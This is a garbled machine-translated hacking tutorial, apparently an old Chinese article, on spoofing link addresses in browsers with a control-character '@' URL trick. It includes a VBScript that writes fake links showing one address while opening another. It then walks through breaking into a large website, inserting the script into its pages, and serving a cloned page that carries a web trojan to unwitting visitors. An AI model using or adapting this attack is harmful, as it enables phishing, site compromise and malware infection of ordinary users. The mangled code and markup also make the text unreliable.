Domain Name spoofing technology implementation process

Web Trojan planting solutions have always had a big problem. Of course, Deception requires skill and time. We do not need to be so difficult to cheat now, this article teaches you how to use the latest browser vulnerabilities to cheat domain names .....
Preface

Domain Name spoofing has multiple implementation methods. This article describes how to use client browser vulnerabilities to spoof users.

This vulnerability exists in most browsers, and no patches are available for the moment. The vulnerability is as follows:
When a user accesses a URL through a browser, if the URL is constructed in the following format, the browser actually accesses the constructed malicious page, what is displayed in the address bar of the user's browser is a false URL:

The URL construction format is:
_ 1] [special_char] @ [url_2]/"target = _ blank> http: // [url_1] [special_char] @ [url_2]

Note:

Url_1 is the address seen by the user. The URL cannot contain "/"
Special_char is a special character, that is, a character with an ASCII Code of 1.
Url_2 is the malicious page address

Exploitation process

First, see the test page:

<HTML>
<Head>
<Title> domain name spoofing technology instance </title>
</Head>
<Body link = "# 0000ff" alink = "# 0000ff" vlink = "# 0000ff">
You can see the differences between the two links: <br>
<H1> link 1: <script language = "VBScript" src = "deceive. vbs"> </SCRIPT> <H1> link 2: <a href = "_ blank?> Www.163.com "target =" _ blank "> http://www.163.com/"; target = "_ blank" http: // Ww... ";> www.163.com </a> </Body>
</Html>

In the source code of this webpage, link 1 points to a vbs script, and link 2 points to site 163. If we change the vbs script of connection 1 to the following code:

''' Deceive. vbs ''''''''''''''''''''''''''''''''''''''' ''''''
'(Please modify the following according to your actual situation :)
Url1 = "http://www.163.com /"
Url2 = "http://www.google.com /"
TEXT = "http://www.163.com /"
Url = "_ blank?> Http: // "; & url1 & CHR (1) &... P; url2 &""
DN = "/"
Mouseover = "onmouseover =" "javascript: window. Status = '_ blank?> Http: // "; & url1 & DN &"'"""
Mouseout = "onmouseout =" "javascript: window. Status = ''"""
Click = "onclick =" "javascript: navigate ('" & URL &"')"""
Style = "style =" "cursor: Hand """
Tag = "<span" & Style & "" & Mouseover & "" & mouseout & "" & click & "> <font color =" "# 0000ff" "> <u> "& text &" </u> </font> </span>"
Document. Write tag
'Note:
'Url1 is the address used to fool the user.
'Url2 is the actual access address, such as webpage Trojans and malicious webpages.
'Text is the link text.
'Note: (you cannot add "http: //" to the spoofing address and actual address ://")
''' Cuts here ''''''''''''''''''''''''''''''''''''''' '''''''''

Now you can see it ~~ When we click this test page, link 1 points to Google.com, And the status bar and address bar are displayed "_ blank> http://www.163.com/", link 2 points to 163.com. You may feel incredible, but this is the charm of the domain name spoofing vulnerability.

As we can imagine, if Link 1 on the above test page points to a webpage trojan instead of Google.com ......

However, no one can view this on an ordinary personal website. Therefore, we need to add this fake link to the pages of other large websites. Suppose we intrude into a relatively large website, such as Netease (Wow ~~~~~~ At this time, a cainiao pushed a car and looked at me ......). At this time, you can change its page.

For example, if there is a text link, we can change "<a href =" xxxxx.htm "> xxxxxx </a>" in the code to our own code: "<script language =" VBScript "src =" deceive. vbs "> </SCRIPT> ". Do you see deceive. vbs In the src attribute? Edit the file and upload it to the directory of the page to be modified.

This is not enough. We need to modify the webpage interface of our Trojan. That is to say, add the previously linked page to our own Trojan page, and all the links in our Trojan page should be the same as the original page, otherwise, the user may be suspicious. Now, we copy all the source code of the Google homepage and add it to our webpage Trojan. Modify the images in the copied code to the linked files, such as logo.gif to _ blank>/uploadfiles/newsphoto/folder. After modification, you can save the file. Upload to Your webpage space.

So far, our work has been completed. Have a cup of coffee and have a rest ......

When we enter this website and click the link we modified, you will find that it is almost the same as the original page (of course, there are some subtle differences, but it is generally difficult to perceive ). When someone browsed this webpage, he was already unaware of the Trojan, And you smiled happily !~ Haha